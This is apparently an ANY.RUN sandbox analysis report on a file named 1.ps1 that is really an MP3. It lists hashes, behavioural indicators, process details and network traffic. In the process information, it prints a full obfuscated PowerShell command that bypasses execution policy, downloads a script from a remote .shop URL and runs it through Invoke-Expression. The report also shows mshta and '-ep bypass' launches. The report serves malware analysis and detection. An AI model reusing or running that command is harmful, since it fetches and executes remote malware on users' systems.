File name:

1.ps1

Full analysis: https://app.any.run/tasks/ec3453c4-2482-482d-9ed5-ac0f5084dfc5
Verdict: Malicious activity
Analysis date: March 24, 2025, 09:30:16
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
lua
Indicators:
MIME: audio/mpeg
File info: Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, JntStereo
MD5:

76CE45DEFFD4208663E82B5030234882

SHA1:

0EAFE1F8CBB3873F2FE981B75788B782C3811D97

SHA256:

EEFE7845F2E97D2F56DEEBC80D2AEB975E68BEF05FEDC15DF77A11309F3587DF

SSDEEP:

98304:EeOKzr2HdlPzmUmN13D7jISo49DxhHKpjS0mUW6nvZBxEHAxrqPnsSs14zwtMi65:pL3b

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 7496)
    • Changes powershell execution policy

      • mshta.exe (PID: 7176)
    • Changes powershell execution policy (Unrestricted)

      • powershell.exe (PID: 7792)
    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 5084)
  • SUSPICIOUS

    • There is functionality for taking screenshot (YARA)

      • vlc.exe (PID: 5972)
    • Reads security settings of Internet Explorer

      • ShellExperienceHost.exe (PID: 7948)
    • The process bypasses the loading of PowerShell profile settings

      • mshta.exe (PID: 7176)
      • powershell.exe (PID: 7792)
    • Base64-obfuscated command line is found

      • mshta.exe (PID: 7176)
    • BASE64 encoded PowerShell command has been detected

      • mshta.exe (PID: 7176)
    • Starts POWERSHELL.EXE for commands execution

      • mshta.exe (PID: 7176)
      • powershell.exe (PID: 7792)
    • Executes script without checking the security policy

      • powershell.exe (PID: 7792)
    • Application launched itself

      • powershell.exe (PID: 7792)
    • Converts a specified value to an integer (POWERSHELL)

      • powershell.exe (PID: 7792)
    • Starts a new process with hidden mode (POWERSHELL)

      • powershell.exe (PID: 7792)
  • INFO

    • Reads security settings of Internet Explorer

      • BackgroundTransferHost.exe (PID: 7668)
      • BackgroundTransferHost.exe (PID: 7468)
      • BackgroundTransferHost.exe (PID: 2136)
      • BackgroundTransferHost.exe (PID: 7836)
      • BackgroundTransferHost.exe (PID: 8052)
    • Reads the computer name

      • vlc.exe (PID: 5972)
    • Checks supported languages

      • vlc.exe (PID: 5972)
      • ShellExperienceHost.exe (PID: 7948)
    • Creates files or folders in the user directory

      • BackgroundTransferHost.exe (PID: 7668)
    • Checks proxy server information

      • BackgroundTransferHost.exe (PID: 7668)
    • Reads the software policy settings

      • BackgroundTransferHost.exe (PID: 7668)
    • The process uses Lua

      • vlc.exe (PID: 5972)
    • Manual execution by a user

      • powershell.exe (PID: 7496)
      • mshta.exe (PID: 7176)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7496)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 7792)
    • Creates or changes the value of an item property via Powershell

      • powershell.exe (PID: 7792)
    • Disables trace logs

      • powershell.exe (PID: 5084)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.mp3 | LAME encoded MP3 audio (ID3 v2.x tag) (62.5)
.mp3 | MP3 audio (ID3 v2.x tag) (37.5)

EXIF

MPEG

MPEGAudioVersion: 1
AudioLayer: 3
AudioBitrate: 128 kbps
SampleRate: 44100
ChannelMode: Joint Stereo
MSStereo: On
IntensityStereo: Off
CopyrightFlag: -
OriginalMedia:
Emphasis: None
VBRFrames: 9055
VBRBytes: 5727907
VBRScale: 80
Encoder: LAME3.99r
LameVBRQuality: 2
LameQuality: -
LameMethod: VBR (new/mtrh)
LameLowPassFilter: 18.5 kHz
LameBitrate: 32 kbps
LameStereoMode: Joint Stereo

ID3

Title: The Prism
Artist: Noe Is Not Unique
Track: 5
RecordingTime: 2022
Genre: postgrunge
Composer: Noe Is Not Unique
PublisherURL: http://www.jamendo.com
Publisher: http://www.jamendo.com
UserDefinedText: (Tagging time) 2022-02-21T17:05:50
EncodedBy: Jamendo:http://www.jamendo.com| LAME
SourceURL: http://www.jamendo.com/en/album/475164
Comment: http://www.jamendo.com cc_standard
FileURL: http://www.jamendo.com/en/track/1927673
ArtistURL: http://www.jamendo.com/en/artist/444317
CopyrightURL: http://creativecommons.org/licenses/by-nc-sa/3.0/
Copyright: http://creativecommons.org/licenses/by-nc-sa/3.0/
Album: -
Year: 2022

Composite

DateTimeOriginal: 2022
AudioBitrate: 194 kbps
Duration: 0:03:57 (approx)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
155
Monitored processes
17
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start vlc.exe sppextcomobj.exe no specs slui.exe backgroundtransferhost.exe no specs backgroundtransferhost.exe backgroundtransferhost.exe no specs backgroundtransferhost.exe no specs backgroundtransferhost.exe no specs powershell.exe no specs conhost.exe no specs slui.exe shellexperiencehost.exe no specs mshta.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
668C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
2108C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Exit code:
0
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
2136"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1C:\Windows\System32\BackgroundTransferHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
5084"C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Unrestricted -Command SV pf (((([Net.WebClient]::New()|Get-Member)|Where-Object{$_.Name -clike'*wn*d*g'}).Name));SV J5 'https://b.yeaio.shop/6d05358b383b5f64f9494d9863daf2ea4cbf96f35212b43.vss';SI Variable:\Oj ([Net.WebClient]::New());.(Variable E*onte* -Va).InvokeCommand.GetCommand((Variable E*onte* -Va).InvokeCommand.GetCommandName('In*ssi*',$TRUE,$TRUE),[System.Management.Automation.CommandTypes]::Cmdlet)(Variable Oj).Value.((GCI Variable:pf).Value)((GCI Variable:\J5).Value) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
5972"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file C:\Users\admin\Desktop\1.ps1.mp3C:\Program Files\VideoLAN\VLC\vlc.exe
explorer.exe
User:
admin
Company:
VideoLAN
Integrity Level:
MEDIUM
Description:
VLC media player
Exit code:
0
Version:
3.0.11
Modules
Images
c:\program files\videolan\vlc\vlc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
6644"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
6740\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7176"C:\Windows\SysWOW64\mshta.exe" "C:\Users\admin\Desktop\1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} C:\Windows\SysWOW64\mshta.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\advapi32.dll
7468"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1C:\Windows\System32\BackgroundTransferHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
7496"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -ep bypass "C:\Users\admin\Desktop\1.ps1"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
Total events
19 499
Read events
19 465
Write events
34
Delete events
0

Modification events

(PID) Process:(7468) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(7468) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(7468) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(7668) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(7668) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(7668) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(7836) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(7836) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(7836) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(8052) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content
Operation:writeName:CachePrefix
Value:
Executable files
4
Suspicious files
12
Text files
9
Unknown types
0

Dropped files

PID
Process
Filename
Type
7668BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\4df98488-da35-45d1-a677-ec32928c27e0.down_data
MD5:
SHA256:
5972vlc.exe
MD5:
SHA256:
5972vlc.exeC:\Users\admin\AppData\Roaming\vlc\vlc-qt-interface.initext
MD5:D8147890F0CD770FCF91E906372C7CD6
SHA256:F35FAF8F7F16A5715E0D771225D7FF626A3E82124CBED8296C33397ABFF39958
7668BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\5247b2bb-50de-4b80-84b8-1ff3b1223931.833c90bc-6eaa-499a-90bf-560ed459ca70.down_metabinary
MD5:C88611A116D788A8EA0B90E4C1B8E6F2
SHA256:ED4EB4A6DD8648EA7C706C1D12787E141F48D62F0F6B13355031F53BBCCFC9C0
7496powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_b0j2d4wn.udn.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5972vlc.exeC:\Users\admin\AppData\Roaming\vlc\ml.xspf.tmp5972xml
MD5:781602441469750C3219C8C38B515ED4
SHA256:81970DBE581373D14FBD451AC4B3F96E5F69B79645F1EE1CA715CFF3AF0BF20D
5972vlc.exeC:\Users\admin\AppData\Roaming\vlc\ml.xspfxml
MD5:781602441469750C3219C8C38B515ED4
SHA256:81970DBE581373D14FBD451AC4B3F96E5F69B79645F1EE1CA715CFF3AF0BF20D
7792powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF12cc22.TMPbinary
MD5:698001685F6966473E4CB5174077BF62
SHA256:4854EDCD3F55F0C2121E04CB58EE5EBAFC1062819F372D82F7420ADFF176F486
7668BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\5247b2bb-50de-4b80-84b8-1ff3b1223931.up_meta_securebinary
MD5:98751DCECD7A4536A576562CDEEE1B7F
SHA256:3C88A8BCB8B6BEE483E060834A3E216E5CA65188F167A69DC6B88B74D4DB6EA7
7496powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AVT64XFJCSKC4PGITDHS.tempbinary
MD5:698001685F6966473E4CB5174077BF62
SHA256:4854EDCD3F55F0C2121E04CB58EE5EBAFC1062819F372D82F7420ADFF176F486
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
14
TCP/UDP connections
36
DNS requests
23
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5972
vlc.exe
GET
200
65.108.45.53:80
http://mb.videolan.org/ws/2/recording/?query=artist%3A%22Noe%20Is%20Not%20Unique%22%20AND%20recording%3A%22The%20Prism%22
unknown
malicious
2104
svchost.exe
GET
200
23.48.23.156:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5972
vlc.exe
GET
301
216.58.212.174:80
http://images.google.com/search?q=Noe+Is+Not+Unique+The+Prism+cover&tbm=isch
unknown
whitelisted
5972
vlc.exe
GET
301
216.58.212.174:80
http://images.google.com/images?q=Noe%20Is%20Not%20Unique%20The%20Prism%20cover
unknown
whitelisted
5972
vlc.exe
GET
200
142.250.186.36:80
http://www.google.com/search?q=Noe+Is+Not+Unique+The+Prism+cover&tbm=isch
unknown
whitelisted
5972
vlc.exe
GET
301
216.58.212.174:80
http://images.google.com/images?q=Noe%20Is%20Not%20Unique%20The%20Prism%20cover
unknown
whitelisted
5972
vlc.exe
GET
200
65.108.45.53:80
http://mb.videolan.org/ws/2/recording/?query=artist%3A%22Noe%20Is%20Not%20Unique%22%20AND%20recording%3A%22The%20Prism%22
unknown
malicious
5972
vlc.exe
GET
301
216.58.212.174:80
http://images.google.com/search?q=Noe+Is+Not+Unique+The+Prism+cover&tbm=isch
unknown
whitelisted
5972
vlc.exe
GET
200
142.250.186.36:80
http://www.google.com/search?q=Noe+Is+Not+Unique+The+Prism+cover&tbm=isch
unknown
whitelisted
6544
svchost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
4
System
192.168.100.255:137
whitelisted
2104
svchost.exe
23.48.23.156:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5972
vlc.exe
65.108.45.53:80
mb.videolan.org
Hetzner Online GmbH
FI
malicious
5972
vlc.exe
216.58.212.174:80
images.google.com
GOOGLE
US
whitelisted
5972
vlc.exe
142.250.186.36:80
www.google.com
GOOGLE
US
whitelisted
3216
svchost.exe
40.113.110.67:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
20.190.159.23:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
crl.microsoft.com
  • 23.48.23.156
  • 23.48.23.143
whitelisted
google.com
  • 142.250.185.142
whitelisted
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.104.136.2
whitelisted
mb.videolan.org
  • 65.108.45.53
malicious
images.google.com
  • 216.58.212.174
whitelisted
www.google.com
  • 142.250.186.36
whitelisted
client.wns.windows.com
  • 40.113.110.67
whitelisted
login.live.com
  • 20.190.159.23
  • 20.190.159.130
  • 20.190.159.75
  • 40.126.31.131
  • 40.126.31.128
  • 40.126.31.3
  • 40.126.31.71
  • 40.126.31.0
whitelisted
ocsp.digicert.com
  • 184.30.131.245
whitelisted
arc.msn.com
  • 20.31.169.57
whitelisted

Threats

No threats detected
No debug info